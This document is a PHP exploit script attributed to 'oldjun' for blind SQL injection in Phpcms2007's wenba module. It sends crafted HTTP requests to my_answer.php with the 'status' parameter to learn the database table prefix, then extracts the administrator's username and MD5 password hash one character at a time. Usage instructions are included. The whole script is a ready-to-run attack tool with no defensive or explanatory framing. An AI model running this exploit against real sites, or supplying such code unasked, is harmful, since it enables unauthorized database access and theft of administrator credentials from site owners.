|
<? print_r(' -------------------------------------------------------------------------------- Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit BY oldjun[S.U.S](http://www.oldjun.com) -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; }
function sendpacketii($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); }
$host=$argv[1]; $path=$argv[2]; $prefix="phpcms_"; $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo "Error... check the path!\r\n\r\n"; die;}
/*get $prefix*/ $packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); //echo $html; if (eregi("in your SQL syntax",$html)) { $temp=explode("FROM ",$html); if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);} if($temp2[0]) $prefix=$temp2[0]; echo "[+]prefix -> ".$prefix."\r\n"; } echo "[~]exploting now,plz waiting...\r\n\r\n";
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n"; die;}
$chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;} } if ($i==255) {die("Exploit failed...");} } $j++; }
$j=1;$username=""; while (!strstr($username,chr(0))) { for ($i=0; $i<=255; $i++) { $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\r\n";break;} if ($i==255) {die("Exploit failed...");} } $j++; } print_r(' -------------------------------------------------------------------------------- [+]username -> '.$username.' [+]password(md5 32λ) -> '.$password.' -------------------------------------------------------------------------------- '); function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?>
|
|
|